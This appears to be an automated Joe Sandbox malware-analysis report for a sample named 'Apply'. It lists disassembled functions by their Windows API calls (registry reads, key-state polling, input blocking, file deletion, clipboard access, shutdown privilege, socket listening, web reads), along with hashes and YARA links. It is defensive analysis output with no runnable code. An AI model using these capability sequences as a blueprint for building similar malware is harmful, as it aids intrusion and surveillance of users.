\, xrefs: 008C44E6
:, xrefs: 008C44F1
\??\%s, xrefs: 008C44CA

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 344f8798f98786a2a1d9cdd4bfe1ea4a2bf7a2f785d32b2ca5608a5b3803ddd9
Instruction ID: 7ddde45050efe6973f8c96af089123928594a5ff2160292131f0454652de1cc9
Opcode Fuzzy Hash: 344f8798f98786a2a1d9cdd4bfe1ea4a2bf7a2f785d32b2ca5608a5b3803ddd9
Instruction Fuzzy Hash: FA31C3B1900249ABDB219FA4DC49FEB77BCFF88700F1050A9F619D61A0E770D7848B20

Function 008DC5CB Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008DD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DBE35,?,?), ref: 008DD13C
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD178
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD1E6
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD21C

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC6C5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 008DC730
RegCloseKey.ADVAPI32(00000000), ref: 008DC754
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008DC7B3
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008DC86E
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DC8DB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DC970
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 008DC9C1
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DCA6A
RegCloseKey.ADVAPI32(?,?,00000000), ref: 008DCB09
RegCloseKey.ADVAPI32(00000000), ref: 008DCB16

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 765eec73b687a3ac99e38bf00c3a56055e853070cdf24242aef3b7f3474cdde3
Instruction ID: 9587a96487075f4c636b06b518a156b994e63209b3f909ab73b86cd66cedc7f6
Opcode Fuzzy Hash: 765eec73b687a3ac99e38bf00c3a56055e853070cdf24242aef3b7f3474cdde3
Instruction Fuzzy Hash: D4022B716042159FC715DF28C891A2ABBE5FF48314F18859DF849CB3A2DB31ED46CB92

Function 008BA36F Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 008BA397
GetAsyncKeyState.USER32(000000A0), ref: 008BA418
GetKeyState.USER32(000000A0), ref: 008BA433
GetAsyncKeyState.USER32(000000A1), ref: 008BA44D
GetKeyState.USER32(000000A1), ref: 008BA462
GetAsyncKeyState.USER32(00000011), ref: 008BA47A
GetKeyState.USER32(00000011), ref: 008BA48C
GetAsyncKeyState.USER32(00000012), ref: 008BA4A4
GetKeyState.USER32(00000012), ref: 008BA4B6
GetAsyncKeyState.USER32(0000005B), ref: 008BA4CE
GetKeyState.USER32(0000005B), ref: 008BA4E0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 62e4a494836a92e35be211e7375908b2e33707ff47c1115a47d3291b9087c0d8
Instruction ID: a448de8a0cd01010c843dbdb38c8198230355d0a302d0e78b967aaacd65e54f8
Opcode Fuzzy Hash: 62e4a494836a92e35be211e7375908b2e33707ff47c1115a47d3291b9087c0d8
Instruction Fuzzy Hash: 7D41A4205047CA69FF39976488083F6BEE0FB25304F048059D5C69A3C2EBE599C88767

Function 008BD65B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00853FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00853E0E,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00854017

Part of subcall function 008BE7DA: GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB

FindFirstFileW.KERNEL32(?,?), ref: 008BD707
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 008BD7C2
MoveFileW.KERNEL32(?,?), ref: 008BD7D5
DeleteFileW.KERNEL32(?,?,?,?), ref: 008BD7F2
FindNextFileW.KERNEL32(00000000,00000010), ref: 008BD81C

Part of subcall function 008BD881: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,008BD801,?,?), ref: 008BD897

FindClose.KERNEL32(00000000,?,?,?), ref: 008BD838
FindClose.KERNEL32(00000000), ref: 008BD849

Strings

\*.*, xrefs: 008BD6B2, 008BD6BB, 008BD6D0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 7169fcda2511b7fa45bfdbac9e8537ab291f083f2a555adcd89eb7ec505808c6
Instruction ID: 5462105160b4daaa63a56ecea6bdbade71e4e8c8af1e2fd1af3e4870dd72f5e6
Opcode Fuzzy Hash: 7169fcda2511b7fa45bfdbac9e8537ab291f083f2a555adcd89eb7ec505808c6
Instruction Fuzzy Hash: 3A613B3180124DABCF05EBA8D9929EDBBB5FF15301F204565E845F6292EB316F0DCB62

Function 008CF4F1 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 008CF518
EmptyClipboard.USER32 ref: 008CF51E
GlobalAlloc.KERNEL32(00000002,?), ref: 008CF533
CloseClipboard.USER32 ref: 008CF62A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 634152b700617c7280d05a45f9bd83abacab1fe239eda4fd052740f42435767a
Instruction ID: 305b8f218d1d67e75d8de9c96b4c56fdbf9a8a8048fb5e6a14f8fe39e862abf2
Opcode Fuzzy Hash: 634152b700617c7280d05a45f9bd83abacab1fe239eda4fd052740f42435767a
Instruction Fuzzy Hash: 02417731204651AFE720DF29E888F15BBA1FF54318F14C0A9EA298F662D775ED46CB90

Function 008BEF37 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 008B1DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008B1DEF
Part of subcall function 008B1DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008B1E1C
Part of subcall function 008B1DA5: GetLastError.KERNEL32 ref: 008B1E2C

ExitWindowsEx.USER32(?,00000000), ref: 008BEF73

Strings

, xrefs: 008BEF9D
, xrefs: 008BEF61
SeShutdownPrivilege, xrefs: 008BEF43
@, xrefs: 008BEF66

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 8a6aa0f3ab97d3e63d486041cb1b8231436aa944c37da49bfd1974f78248a88a
Instruction ID: 210ac2882db8ac6e79e74be559a124a60144dbfde10ef42e93607ecc847cddf0
Opcode Fuzzy Hash: 8a6aa0f3ab97d3e63d486041cb1b8231436aa944c37da49bfd1974f78248a88a
Instruction Fuzzy Hash: BA01D672620315AFEB2466B89CC9FFF766CFB44384F150461FD02EA3D2DE649D448194

Function 008D198B Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008D19FD
WSAGetLastError.WSOCK32 ref: 008D1A0A
bind.WSOCK32(00000000,?,00000010), ref: 008D1A41
WSAGetLastError.WSOCK32 ref: 008D1A4C
closesocket.WSOCK32(00000000), ref: 008D1A7B
listen.WSOCK32(00000000,00000005), ref: 008D1A8A
WSAGetLastError.WSOCK32 ref: 008D1A94
closesocket.WSOCK32(00000000), ref: 008D1AC3

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 162f5dd06f4a883ac506597594d1d84a64caa5fe28035afa6bddbe2b49a255c7
Instruction ID: d68012dbc8be4780008fb0e55f0f72f5eebff47eab98cdbaf592a21b0f97220b
Opcode Fuzzy Hash: 162f5dd06f4a883ac506597594d1d84a64caa5fe28035afa6bddbe2b49a255c7
Instruction Fuzzy Hash: 92417131600250AFDB10DF28C499B29BBE5FF45318F188299E8568F392C771EC85CBE1

Function 008CA29A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 008CA2E7
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 008CA3FA

Part of subcall function 008C3FE3: GetInputState.USER32 ref: 008C403A
Part of subcall function 008C3FE3: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008C40D5

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 008CA317
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 008CA3E4

Strings

*.*, xrefs: 008CA2CC

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 62730dd4e46299c941daaec4449235c7a2eb0a546b7bace36232cc3166e1b92c
Instruction ID: f4002b8d0b7ba9c14f43e425fffcdcd3ff0a2dba1cb34779a271dabb4a363f98
Opcode Fuzzy Hash: 62730dd4e46299c941daaec4449235c7a2eb0a546b7bace36232cc3166e1b92c
Instruction Fuzzy Hash: 42415D7190024D9FCF18DFA8C995AEEBBB4FF05315F20415AE805E6291E771DE88CB52

Function 008E23FC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 008E247B
IsWindowEnabled.USER32 ref: 008E2489
GetForegroundWindow.USER32(?,?,00000001,?), ref: 008E2496
IsIconic.USER32 ref: 008E24A4
IsZoomed.USER32 ref: 008E24B2

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: f67910109f6956242e07d1853e9dfed1f1e2a717c7cb712259268f06a8b5e9ef
Instruction ID: 6cce7e5f64b352d996f7bda79dddbad7125cb6127244cb1771bd97b3c26c4361
Opcode Fuzzy Hash: f67910109f6956242e07d1853e9dfed1f1e2a717c7cb712259268f06a8b5e9ef
Instruction Fuzzy Hash: 8F21F4317002909FD7209F2BC844B1A7BE8FF96319F19806CE849CB292DB71DD42CB95

Function 008CD5B3 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 008CD5F8
GetLastError.KERNEL32(?,00000000), ref: 008CD659
SetEvent.KERNEL32(?,?,00000000), ref: 008CD66D

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: aab0b5ad2ef24037657bdbeb9dd8ca6c5e670e53e247c7831cf8eec319f15e0e
Instruction ID: 89968339538fc5040a53de48cd121e0c52e9e5fc9b57418193061adb1cf14097
Opcode Fuzzy Hash: aab0b5ad2ef24037657bdbeb9dd8ca6c5e670e53e247c7831cf8eec319f15e0e
Instruction Fuzzy Hash: F12190B1500708ABD720AF65D988FAAB7F8FB50318F10442EE64AD6151E774EA45CB94

Function 008C593C Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008C5949
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008C59A7
SetErrorMode.KERNEL32(00000000), ref: 008C5A10

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 9ae775283c761eb27f4787d4c28aaa2a5048f1095026e818c20b444516bae4d1
Instruction ID: 8796c30bddd3ca9afff355408bb908c56d866fad5cf7ff5417d545d57955c6aa
Opcode Fuzzy Hash: 9ae775283c761eb27f4787d4c28aaa2a5048f1095026e818c20b444516bae4d1
Instruction Fuzzy Hash: CB311875A10618AFDB00DF58D884FADBBB4FF48318F148099E8459B252DB71E85ACB91

Function 00875038 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0087500E,?,009198A8,0000000C,00875165,?,00000002,00000000), ref: 00875059
TerminateProcess.KERNEL32(00000000,?,0087500E,?,009198A8,0000000C,00875165,?,00000002,00000000), ref: 00875060
ExitProcess.KERNEL32 ref: 00875072

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 82729a22a9c3c3357dd837ad695b2090a8be7423e4b630ac5d00e355e2dc103c
Instruction ID: c85a3b395d1269b96230026571065198d54f035385f0598ff5aa0b1b8b32b9a3
Opcode Fuzzy Hash: 82729a22a9c3c3357dd837ad695b2090a8be7423e4b630ac5d00e355e2dc103c
Instruction Fuzzy Hash: ECE0B631000A88AFCF21AF54DD49A587B69FB41785F048014F8098A226DB76EE46CB91

Function 008AE514 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 008AE526

Strings

X64, xrefs: 008AE542

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 8e01159f540eca50e8cdc22e98ab518bb5dbce330d3d9f06f1c035bf2df1ec6b
Instruction ID: 6c0184f3fb573df3c0eb986d6c9013fcfd7f4daf2279f6035fa72a998566fa3b
Opcode Fuzzy Hash: 8e01159f540eca50e8cdc22e98ab518bb5dbce330d3d9f06f1c035bf2df1ec6b
Instruction Fuzzy Hash: 55D0C9B881512DEACB90CB50ECC8DD9777CBB04308F144551F506E6100E73096488B10

Function 008B17A1 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008B18DE), ref: 008B17B6
CloseHandle.KERNEL32(?,?,008B18DE), ref: 008B17CB

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3c19d388c1f2d58ed6a3167259f87d567d083daf588109eaf58f00edf8fca5b3
Instruction ID: 209427fa98cf00e9013eae09c03fb7753dc0770a9cc710467ff5be5a00577a01
Opcode Fuzzy Hash: 3c19d388c1f2d58ed6a3167259f87d567d083daf588109eaf58f00edf8fca5b3
Instruction Fuzzy Hash: 16E01A72004610EEE7252B14EC0AE7277E9FB04310B24882DF4A585474DA62AC909A10

Function 008CF229 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 008CF244

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 3c9620897669103c390e9a856413e7a13f2a31df8be62f4056b53d8ad9bbb470
Instruction ID: f557b80086f29cd01b2f93070f53a4f6e7e89c6d08a0ecd5e63e07d9130596f5
Opcode Fuzzy Hash: 3c9620897669103c390e9a856413e7a13f2a31df8be62f4056b53d8ad9bbb470
Instruction Fuzzy Hash: 2EE012362102045FD7109F59D445E56BBE9FF54764F008029FD49CB251D6B0E8458B91

Function 008BE996 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008BE9BF

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: a003127194ddca70adc35c72bb62d89b2f8d9712243b2fc9c6dcaed0071df4ef
Instruction ID: c97b20349010c4343c4da1c1e024e85b67dad4c0b30c0e8afa174d49f6f0a978
Opcode Fuzzy Hash: a003127194ddca70adc35c72bb62d89b2f8d9712243b2fc9c6dcaed0071df4ef
Instruction Fuzzy Hash: CAD052B22A0B003CEDAC0A3C9D6FFF60E09F702B44F808349F542C9BD5E481E80CA022

Function 008D3265 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 008D32B7
DeleteObject.GDI32(00000000), ref: 008D32CA
DestroyWindow.USER32 ref: 008D32D9
GetDesktopWindow.USER32 ref: 008D32F4
GetWindowRect.USER32(00000000), ref: 008D32FB
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 008D342A
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 008D3438
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D347F
GetClientRect.USER32(00000000,?), ref: 008D348B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008D34C7
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D34E9
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D34FC
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D3507
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D3510
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D351F
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D3528
